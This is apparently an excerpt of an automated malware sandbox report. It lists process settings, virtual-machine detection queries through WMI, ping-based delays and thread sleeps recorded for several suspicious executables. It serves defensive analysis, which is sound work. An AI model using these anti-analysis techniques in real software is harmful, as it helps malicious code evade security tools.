Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

System information queried: FirmwareTableInformation

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory allocated: E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory allocated: 29C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory allocated: 28D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Memory allocated: 1100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Memory allocated: 2AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Memory allocated: 2A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Memory allocated: 1F52CE60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Memory allocated: 1F546760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory allocated: 21EAA870000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory allocated: 21EC2A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory allocated: 180E2060000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory allocated: 180FB830000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory allocated: 2550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory allocated: 27B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory allocated: 2550000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_00007FF93A736143 sldt ax

8_2_00007FF93A736143

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\l6E.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Window / User API: threadDelayed 1995	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Window / User API: threadDelayed 9920	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9590	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 9960
Source: C:\Users\user\AppData\Roaming\l6E.exe	Window / User API: threadDelayed 1993

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe TID: 6912	Thread sleep count: 1995 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe TID: 1948	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe TID: 8432	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe TID: 8444	Thread sleep count: 9920 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe TID: 324	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5312	Thread sleep count: 9590 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5312	Thread sleep count: 287 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe TID: 7476	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe TID: 8908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\l6E.exe TID: 9048	Thread sleep count: 1993 > 30
Source: C:\Users\user\AppData\Roaming\l6E.exe TID: 9020	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 9080	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 9068	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7068	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
